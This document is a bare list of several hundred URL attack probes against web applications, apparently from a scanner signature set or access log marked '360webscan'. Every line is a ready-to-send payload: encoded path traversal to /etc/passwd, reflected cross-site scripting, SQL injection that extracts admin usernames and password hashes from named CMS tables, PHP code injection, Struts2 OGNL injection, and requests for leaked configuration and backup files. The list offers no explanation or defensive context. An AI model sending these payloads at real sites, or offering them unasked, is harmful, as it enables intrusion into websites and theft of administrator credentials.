/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/solr/dev/admin/
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/level/15/exec/-/show/running-config/CR
/plugins/weathermap/weathermap-cacti-plugin.php
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/.../.../.../.../.../.../.../.../etc/passwd
/
/icons/index
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/small/index
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/
/%3Cscript%3Ealert(42873).do
/
/%3Cscript%20s%3Ealert(42873)
/
/
/?%22onmouseover='prompt(42873)'bad=%22%3E
/%22%3E%3CsCrIpT%3Eprompt(42873)
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/
/'IHLD
/
/
/
/install.php
/
/
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/
/extras/curltest.php?url=file://curltest.php
/
/.svn/entries
/
/
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
